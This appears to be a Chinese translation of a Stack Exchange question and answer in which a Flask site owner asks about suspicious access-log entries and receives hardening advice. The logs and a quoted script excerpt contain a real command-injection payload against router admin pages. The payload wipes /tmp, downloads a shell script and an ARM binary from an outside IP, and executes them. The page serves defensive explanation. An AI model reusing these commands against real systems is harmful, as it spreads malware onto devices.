Flask应用出现异常连接,是否存在安全风险?
是否需要重新考虑网站托管方式?
我用Flask搭建了一个小型网站,用于帮助自己和朋友整理学习资料并方便访问。在连接记录中发现了以下异常请求:
185.224.128.191 - - [16/Jan/2024 16:00:56] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp;%20rm%20-rf%20*;%20wget%20http%3A%2F%2F104.168.5.4%2Ftenda.sh;%20chmod%20777%20tenda.sh;.%2Ftenda.sh) HTTP/1.1" 404 - 188.214.132.164 - - [16/Jan/2024 16:06:27] "CONNECT 84.32.188.22:602 HTTP/1.1" 404 -
查看tenda.sh文件后发现其中包含大量恶意操作,例如:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O "BADWORD" http://104.168.5.4/arm7; chmod +x "BADWORD"; ./BADWORD tplink
目前网站已下线,询问是否需要重新考虑托管方式。
回答
攻击未成功
- 第一条请求是针对OpenWRT路由器LuCI管理界面的远程代码执行(RCE)扫描,你的Flask网站不存在
/cgi-bin/luci路径,返回404说明攻击未触发。 - 第二条CONNECT请求是典型的代理探测请求,同样因路径不匹配被拦截,无实际威胁。
- 第一条请求是针对OpenWRT路由器LuCI管理界面的远程代码执行(RCE)扫描,你的Flask网站不存在
无需立刻更换托管方式,但必须完成这些加固动作
- 配置防火墙:仅放行网站所需端口(如80/443),若仅自己和固定朋友使用,直接设置IP白名单封禁其他所有访问。
- 启用HTTPS:使用免费证书加密传输,避免明文泄露敏感信息。
- 替换Flask开发服务器:改用Gunicorn+Nginx这类生产级部署方案,Flask自带的开发服务器不具备安全防护能力。
- 监控与自动封禁:用
fail2ban工具自动识别并封禁频繁扫描的恶意IP,定期检查访问日志。 - 加强认证(若有登录功能):使用强密码+双因素认证,防止未授权访问。
关于恶意脚本
tenda.sh
该脚本的作用是遍历系统目录下载并执行ARM架构的恶意程序,大概率是挖矿木马或后门,但因你的网站无对应漏洞入口,无法触发执行,无需担心服务器已被感染。
内容的提问来源于stack exchange,提问作者Emil12232335
相关产品推荐
相关产品推荐

